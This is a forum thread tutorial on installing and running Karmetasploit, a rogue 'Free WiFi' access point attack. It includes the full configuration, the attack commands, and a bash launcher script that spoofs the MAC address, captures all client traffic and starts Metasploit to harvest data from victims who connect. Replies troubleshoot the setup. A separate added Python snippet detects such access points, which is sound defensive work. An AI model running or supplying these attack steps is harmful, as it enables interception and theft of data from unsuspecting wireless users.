
Thread: Tutorial : Karmetasploit

  1. #1
    williamc (Good friend of the forums; Join Date: Feb 2010; Location: Chico CA; Posts: 285)

    Tutorial : Karmetasploit

    I put together this step-by-step tutorial for getting Karmetasploit installed and working under BT3. Most of this information can be found in other posts, but now it's all in one place.

    Prerequisites:
    Latest version of Aircrack-ng:
    Code:
    svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
    Latest version of Metasploit:
    Code:
    svn co http://metasploit.com/svn/framework3/trunk msf3
    Karmetasploit .rc file:
    http://metasploit.com/users/hdm/tools/karma.rc (save to /pentest/exploits/framework3/ (BT3 Beta) or /msf3 (BT3 final))

    Older release of DHCPD (newer releases won't work on BT3 due to IPv6 issues):
    http://ftp.isc.org/isc/dhcp/dhcp-3.0.7.tar.gz

    Sqlite3:
    http://www.sqlite.org/sqlite-3.6.4.tar.gz

    Run make && make install for all these packages.

    Configuration
    Now configure your dhcpd configuration file. This is located at /etc/dhcpd.conf.
    Paste the following into the file and save (provided you're using 10.0.0.0/24 networking):
    Code:
    option domain-name-servers 10.0.0.1;
    
    default-lease-time 60;
    max-lease-time 72;
    
    ddns-update-style none;
    
    authoritative;
    
    log-facility local7;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
      range 10.0.0.100 10.0.0.254;
      option routers 10.0.0.1;
      option domain-name-servers 10.0.0.1;
    }
    You must manually create the dhcpd.leases file before running dhcpd.
    Code:
     touch /var/state/dhcp/dhcpd.leases
    Execution
    Commands are run assuming you are using a Realtek card. Change wlan0 to match your configuration.
    Code:
    airbase-ng -P -C 30 -e "Free WiFi" -v wlan0 
    ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
    dhcpd -cf /etc/dhcpd.conf at0
    ifconfig at0 mtu 1400
    msfconsole -r karma.rc
    Now have your client attempt to connect to your "Free WiFi" access point. You should see a "Loading" screen in IE or Firefox. Now in Backtrack, open your sqlite database to see what you've gathered:
    Code:
    cd /root
    sqlite3 karma.db
    sqlite>.mode html
    sqlite>.output karma.html
    sqlite>select * from notes;
    sqlite>.quit
    Open the html file in your browser.

    If all these steps work, I'd recommend using this script by BadKarmaPR to automate the setup process:
    Code:
    #!/bin/bash
    #=================================================
    #
    # FILE: kmsapng.sh
    #
    # USAGE: ./kmsapng.sh <options>
    #
    # DESCRIPTION: Script to launch Karmetasploit
    #
    # OPTIONS: Wireless card supported by Aircrack-ng for injection.
    #	   File with MAC addresses for filtering connections
    # BUGS: Only has been tested with Atheros, Realtek L8187 and Ralink 2750 cards.
    # NOTES: Latest SVN version of Aircrack-ng as well as latest drivers must be used.
    # AUTHOR: carlos_perez(at)darkoperator.com
    # VERSION: 0.2
    # CREATED: 09/23/2008 02:06:42 PM
    # REVISION:10/15/2008 5:00 PM added options for launching, only have spent 50 min
    #          in total writing the script I know if I had more time I could add more to it.
    #TODO: Add option for creating valid AP using dnsmasq and ipfilters
    #=================================================
    #Initialize interface variable
    IW=
    #Initialize mode variable
    MODE=
    SSID="Free Wifi"
    #Variable with number of arguments passed to the script
    NUM=$#
    #Variable with log file location for troubleshooting
    LOGFILE=/root/karma.log
    A1="ath0"
    #Capture ctrl-c and proceed to clean up any process left
    trap cleanup INT
    #Usage function for printing the help message
    function usage ()
    {
    	echo 'Karmetasploit AP launcher by Carlos Perez for Backtrack3'
    	echo 'Version 0.2'
    	echo 'carlos_perez[at]darkoperator.com'
    	echo "usage: kmsap.sh <options>"
    	echo " "
    	echo "Options:"
    	echo "-m <mode>        : Mode, either km for regular karmetasploit attack"
    	echo "                   or kmf for filtered attack where only targeted "
    	echo "                   clients can associate to the fake AP."
    	echo "-i <interface>   : Interface supported by aircrack-ng for injection"
    	echo "-f <filter file> : Text file with mac addresses of client computers"
    	echo "                   permitted to connect to the fake AP."
    	echo "-s <ssid>        : SSID name used as the initial broadcast"
    	echo "-h               : This help message"
    	echo ""
    	echo "Note: mode and interface are required for both types of attack"
    }
    #function to set the interface in monitor mode
    #(commands run in the foreground so each one finishes before the next)
    function monitormode ()
    {
    	if [ "$IW" = "$A1" ]; then
    		ifconfig $IW down >> $LOGFILE 2>&1
    		wlanconfig ath0 destroy >> $LOGFILE 2>&1
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A wifi0
    		airmon-ng start wifi0 >> $LOGFILE 2>&1
    		sleep 2
    	else
    		ifconfig $IW up >> $LOGFILE 2>&1
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A $IW
    		airmon-ng start $IW >> $LOGFILE 2>&1
    		sleep 2
    	fi
    } # ---------- end of function monitormode ----------
    #function for cleaning up any process that might have been left running
    function cleanup ()
    {
    	killall -9 dhcpd tcpdump airbase-ng >> $LOGFILE 2>&1
    	echo > /var/state/dhcp/dhcpd.leases
    	airmon-ng stop $IW >> $LOGFILE 2>&1
    	exit 1
    } # ---------- end of function cleanup ----------
    #Function for launching regular karmetasploit attack
    function apall ()
    {
    	modprobe tun
    	echo -e "\033[1;32mstarting fake ap\033[1;37m"
    	airbase-ng -P -C 30 -e "$SSID" $IW >> $LOGFILE 2>&1 &
    	#give enough time before next command for interface to come up
    	#especially on Virtual Machines with USB cards
    	echo "This will take 15 seconds .............."
    	sleep 15
    }
    #Function for launching fake AP with MAC filtering
    function apfiltered ()
    {
    	modprobe tun
    	#quoted so that an empty FILTER fails the test instead of passing it
    	if [ -e "$FILTER" ]; then
    		echo -e "\033[1;32mstarting fake ap with MAC Filtering\033[1;37m"
    		airbase-ng -P -C 30 --clients "$FILTER" -e "$SSID" $IW >> $LOGFILE 2>&1 &
    	else
    		echo -e "\033[1;31mFilter File does not exist\033[1;37m"
    		echo "$FILTER"
    		cleanup
    	fi
    	#give enough time before next command for interface to come up
    	echo "This will take 15 seconds .............."
    	sleep 15
    }
    #function for setting MTU value, launching DHCP server, starting packet capture,
    #setting the blackhole for any client with cached DNS entries and launching metasploit
    function startinf ()
    {
    	#set the IP address that was configured in the dhcpd.conf file
    	#as the default gateway and DNS server
    	ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
    	if [ $? -ne 0 ]; then
    		echo -e "\033[1;31mIt appears the AP did not start, check $LOGFILE for errors\033[1;37m"
    		cleanup
    	fi
    	#set mtu: try 1800 on the wireless card, otherwise lower at0 to 1400
    	if ! ifconfig $IW mtu 1800 >> $LOGFILE 2>&1; then
    		ifconfig at0 mtu 1400 >> $LOGFILE 2>&1
    	fi
    	sleep 2
    	#Clear any dhcp leases that might have been left behind
    	echo > /var/state/dhcp/dhcpd.leases
    	#start dhcpd daemon with special configuration file; the exit status of a
    	#background launch is always 0, so check for a running dhcpd process instead
    	dhcpd -cf /etc/dhcpd.conf at0 >> $LOGFILE 2>&1 &
    	sleep 2
    	if ! pgrep -x dhcpd > /dev/null; then
    		echo -e "\033[1;31mThe DHCPD server could not be started, exiting\033[1;37m"
    		cleanup
    	else
    		echo -e "\033[1;32mDHCPD started successfully\033[1;37m"
    	fi
    	#capture all packets
    	echo -e "\033[1;32mStarting Packet capture to /root/kms.cap\033[1;37m"
    	tcpdump -ni at0 -s 0 -w /root/kms.cap >/dev/null 2>&1 &
    	#set Blackhole Routing to bypass cached DNS entries
    	iptables -t nat -A PREROUTING -i at0 -j REDIRECT
    	#start metasploit with special script
    	echo -e "\033[1;32mStarting Metasploit\033[1;37m"
    	/msf3/msfconsole -r /msf3/karma.rc && cleanup
    }

    #--------------------MAIN-----------------------
    while getopts ":m:i:f:s:h" options; do
      case $options in
        m ) MODE=$OPTARG;;
        i ) IW=$OPTARG;;
        f ) FILTER=$OPTARG;;
        s ) SSID=$OPTARG;;
        h ) usage
            exit 0;;
        \? ) usage
             exit 1;;
        * ) usage
            exit 1;;
      esac
    done
    if [[ -n "$MODE" && -n "$IW" ]]; then
    	case $MODE in
    	km) monitormode
    	    apall
    	    startinf ;;
    	kmf) monitormode
    	     apfiltered
    	     startinf ;;
    	*) usage ;;
    	esac
    else
    	usage
    fi
    If all this works, we can move on to configuring "Wireless Key Grabber":
    http://forums.remote-exploit.org/showthread.php?t=21144

    *This post was put together with information from HDM, BadKarmaPR, PaulDotCom, leaferz, HM2075.

    William
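    From the defender's side, an added example that is not part of williamc's tutorial or the script above: airbase-ng's -P flag makes the fake AP answer every directed probe request, so in a monitor-mode capture one BSSID appears to respond for whatever SSIDs nearby clients ask for, while a real AP answers only for its own. The Python below flags such a BSSID over constructed probe-request/response records; the record shape, MAC addresses and SSIDs are assumptions.

```python
"""Flag a Karma-style access point that answers probes for any SSID.

Added defender-side example, not from the thread. airbase-ng -P answers
every directed probe request, so one BSSID ends up responding for the
SSIDs nearby clients ask for, while a legitimate AP answers only for
its own SSID(s). Record format, MAC addresses and SSIDs are constructed.
"""
from collections import defaultdict

# Constructed observations: (frame_type, mac, ssid). For a probe request
# the MAC is the client; for a probe response it is the responding BSSID.
SAMPLE = [
    ("probe_req", "02:11:22:33:44:55", "HomeNet-7F"),
    ("probe_req", "02:11:22:33:44:55", "CoffeeShop"),
    ("probe_req", "02:66:77:88:99:aa", "Corp-Guest"),
    ("probe_resp", "02:aa:bb:cc:dd:ee", "HomeNet-7F"),
    ("probe_resp", "02:aa:bb:cc:dd:ee", "CoffeeShop"),
    ("probe_resp", "02:aa:bb:cc:dd:ee", "Corp-Guest"),
    ("probe_resp", "02:aa:bb:cc:dd:ee", "Free WiFi"),
    ("probe_resp", "02:de:ad:be:ef:01", "Corp-Guest"),
]


def find_karma_suspects(records, min_echoed=2):
    """Return {bssid: sorted SSIDs answered} for every BSSID that answered
    probe requests for at least `min_echoed` distinct SSIDs that clients
    actually asked for.  Matching responses against requests, rather than
    just counting SSIDs, is what separates a Karma AP from a normal
    multi-SSID access point; tune min_echoed to the site."""
    requested = set()
    answered = defaultdict(set)
    for kind, mac, ssid in records:
        if kind == "probe_req" and ssid:
            requested.add(ssid)
        elif kind == "probe_resp":
            answered[mac.lower()].add(ssid)
    suspects = {}
    for bssid, ssids in answered.items():
        echoed = ssids & requested
        if len(echoed) >= min_echoed:
            suspects[bssid] = sorted(ssids)
    return suspects


if __name__ == "__main__":
    for bssid, ssids in find_karma_suspects(SAMPLE).items():
        print(f"suspect {bssid} answered probes for: {', '.join(ssids)}")
```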

  2. #2
    (rank: Just burned his ISO; Join Date: Jan 2010; Location: Germany; Posts: 6)

    Hello williamc,

    First of all, thank you for your tutorial! I tried to use it on my BackTrack 3 VM image, but I've got problems with dhcpd. My clients don't get an IP address, so I searched the threads and posts, but I couldn't find an answer.

    I used dhcpd 3.0.6, so I think IPv6 shouldn't be the problem.
    The dhcpd.conf is exactly the same.
    Aircrack and Metasploit were updated via fast-track.

    Is perhaps my Alfa USB RTL8187 card the problem?

    After airbase-ng -P -C 30 -e "Free WiFi" -v wlan0 my screen looks like this:

    Code:
    15:50:25  Created tap interface at0
    15:50:25  Trying to set MTU on at0 to 1500
    15:50:25  Trying to set MTU on wlan0 to 1800
    error setting MTU on wlan0
    15:50:25  MTU on wlan0 remains at 1500
    15:50:25  Access Point with BSSID 00:06:A8:D4:BF:CE started.
    15:50:28  Got broadcast probe request from 00:21:5D:9E:28:9C
    ... snip ...
    16:02:06  Got directed probe request from 00:12:F0:24:21:8C - "Free Wifi"
    16:02:06  Got directed probe request from 00:12:F0:24:21:8C - "Free Wifi"
    16:02:06  Got directed probe request from 00:12:F0:24:21:8C - "Free Wifi"
    16:02:06  Got an auth request from 00:12:F0:24:21:8C (open system)
    16:02:06  Client 00:12:F0:24:21:8C associated (unencrypted) to ESSID: "Free Wifi"
    16:02:07  Got broadcast probe request from 00:12:F0:24:21:8C
    ... snip ...

    and dhcpd -cf /etc/dhcpd.conf at0
    Code:
    Internet Systems Consortium DHCP Server V3.0.6
    Copyright 2004-2007 Internet Systems Consortium.
    All rights reserved.
    For info, please visit .isc.org/sw/dhcp/
    Wrote 0 leases to leases file.
    Listening on LPF/at0/00:06:a8:d4:bf:ce/10.0.0/24
    Sending on   LPF/at0/00:06:a8:d4:bf:ce/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    So I also entered the other commands and tried to connect to my faked AP, but it doesn't work ... the client gets no IP address.

    Thanks in advance

  3. #3
    williamc (Good friend of the forums; Join Date: Feb 2010; Location: Chico CA; Posts: 285)

    I may have missed a step. Did you create your dhcpd.leases file? Use this command:
    Code:
     touch /var/state/dhcp/dhcpd.leases
    William

  4. #4
    imported_Deathray (Member; Join Date: Oct 2007; Posts: 381)

    Thanks for the great tutorial williamc. I'm just a bit unlucky :b

    Exactly the same problem as pascal, although I went a step further and watched Wireshark on both BackTrack and the "victim".
    The Vista box was sending DHCP Discover but BackTrack was seeing them as "malformed packets". Don't know what's going on, I'll get back if I find out but feel free to
    - Poul Wittig

  5. #5
    williamc (Good friend of the forums; Join Date: Feb 2010; Location: Chico CA; Posts: 285)

    What is your testing environment? Please post OS, Wireless drivers, etc. Did you try using the script if the manual method didn't work?

    William

  6. #6
    imported_Deathray (Member; Join Date: Oct 2007; Posts: 381)

    I'm using VMware with an rt2571WF chipset card (latest rt73enhanced driver) with the latest version of aircrack. The victim can connect but simply won't get an IP. No, I haven't looked at the script; I'll go ahead and do that right away.
    Btw, what is the reason you tell us to download dhcpd when it is already contained in BackTrack?
    - Poul Wittig

  7. #7

    Nice tutorial, short and simple. Your mileage will vary depending on the card; I have been able to get the best results from Atheros and RT2700. When you get the dnsmasq stuff working let me know and we can integrate it into the script I made if you like.

  8. #8
    imported_Deathray (Member; Join Date: Oct 2007; Posts: 381)

    I believe my problem is that the wireless interface that will act as an AP is in the USB plug of the same computer which will connect with an internal card. In other words, they are extremely close to each other. Wireshark is showing a lot of "Bogus fragment", "Link Data", "Malformed Packet".

    Sometimes I get lucky and it starts working. But it's rare.
    I'll see if it gets better once I get my Alfa in the mail.
    Oh, and this link might be a good read, people: Karmetasploit
    Here is a script I made to create the fake AP and forward everything to eth0. I use OpenDNS as the dns in dhcpd.conf so I don't need dnsmasq.

    edit: deprecated. Read my tutorial http://forums.remote-exploit.org/showthread.php?t=19048
    - Poul Wittig
